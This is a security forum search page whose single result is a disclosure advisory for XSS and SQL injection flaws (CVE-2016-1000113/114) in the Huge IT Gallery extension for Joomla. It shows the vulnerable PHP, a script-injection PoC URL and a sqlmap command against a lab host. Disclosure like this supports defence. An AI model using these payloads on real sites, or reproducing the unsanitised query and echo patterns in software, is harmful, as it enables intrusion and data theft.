Jump to content

Search the Community

Showing results for tags 'joomla juge it gallery'.

  • Search By Tags

    Type tags separated by commas.
  • Search By Author

Content Type


Forums

  • Informatii generale
    • Anunturi importante
    • Bine ai venit
    • Proiecte RST
  • Sectiunea tehnica
    • Exploituri
    • Challenges (CTF)
    • Bug Bounty
    • Programare
    • Securitate web
    • Reverse engineering & exploit development
    • Mobile security
    • Sisteme de operare si discutii hardware
    • Electronica
    • Wireless Pentesting
    • Black SEO & monetizare
  • Tutoriale
    • Tutoriale in romana
    • Tutoriale in engleza
    • Tutoriale video
  • Programe
    • Programe hacking
    • Programe securitate
    • Programe utile
    • Free stuff
  • Discutii generale
    • RST Market
    • Off-topic
    • Discutii incepatori
    • Stiri securitate
    • Linkuri
    • Cosul de gunoi
  • Club Test's Topics
  • Clubul saraciei absolute's Topics
  • Chernobyl Hackers's Topics
  • Programming & Fun's Jokes / Funny pictures (programming related!)
  • Programming & Fun's Programming
  • Programming & Fun's Programming challenges
  • Bani pă net's Topics
  • Cumparaturi online's Topics
  • Web Development's Forum
  • 3D Print's Topics

Find results in...

Find results that contain...


Date Created

  • Start

    End


Last Updated

  • Start

    End


Filter by number of...

Joined

  • Start

    End


Group


Website URL


Yahoo


Jabber


Skype


Location


Interests


Occupation


Interests


Biography


Location

Found 1 result

  1. Title: XSS and SQLi in huge IT gallery v1.1.5 for Joomla Fixed: v1.1.7 Author: Larry W. Cashdollar, @_larry0 and Elitza Neytcheva, @ElitzaNeytcheva Date: 2016-07-14 Download Site: http://extensions.joomla.org/extensions/extension/photos-a-images/galleries/gallery-pro Vendor: huge-it.com Vendor Notified: 2016-07-15, fixed 2016-07-23 Vendor Contact: info@huge-it.com Description: The plugin allows you to add multiple images to the gallery, create countless galleries, add a description to each of them, as well as make the same things with video links. Vulnerability: The attacker must be logged in with at least manager level access or access to the administrative panel to exploit this vulnerability: SQL in code via id parameter: ./administrator/components/com_gallery/models/gallery.php 51 public function getPropertie() { 52 $db = JFactory::getDBO(); 53 $id_cat = JRequest::getVar('id'); 54 $query = $db->getQuery(true); 55 $query->select('#__huge_itgallery_images.name as name,' 56 . '#__huge_itgallery_images.id ,' 57 . '#__huge_itgallery_gallerys.name as portName,' 58 . 'gallery_id, #__huge_itgallery_images.description as description,image_url,sl_url,sl_type,link_target,#__huge_itg allery_images.ordering,#__huge_itgallery_images.published,published_in_sl_width'); 59 $query->from(array('#__huge_itgallery_gallerys' => '#__huge_itgallery_gallerys', '#__huge_itgallery_images' => '#__huge_itg allery_images')); 60 $query->where('#__huge_itgallery_gallerys.id = gallery_id')->where('gallery_id=' . $id_cat); 61 $query->order('ordering desc'); 62 64 $db->setQuery($query); 65 $results = $db->loadObjectList(); 66 return $results; 67 } XSS is here: root@Joomla:/var/www/html# find . -name "*.php" -exec grep -l "echo \$_GET" {} \; ./administrator/components/com_gallery/views/gallery/tmpl/default.php root@Joomla:/var/www/html# find . -name "*.php" -exec grep -n "echo \$_GET" {} \; 256: <a class="modal" rel="{handler: 'iframe', size: {x: 800, y: 500}}" href="index.php?option=com_gallery&view=video&tmpl=component&pid=<?php echo $_GET['id']; ?>" title="Image" > CVE Assignments:A CVE-2016-1000113 XSS,A CVE-2016-1000114 SQL Injection JSON: Export Exploit Code: XSS PoC http://192.168.0.125/administrator/index.php?option=com_gallery&view=gallery&id=1--%20%22%3E%3Cscript%3Ealert(1);%3C/script%3E SQLi PoC http://192.168.0.125/administrator/index.php?option=com_gallery&view=gallery&id=SQLiHERE $ sqlmap --load-cookies=cookies.txt -u "http://192.168.0.125/administrator/index.php?option=com_gallery&view=gallery&id=*" --dbms mysql Screen Shots: Advisory:A http://www.vapidlabs.com/advisory.php?v=164 via
×
×
  • Create New...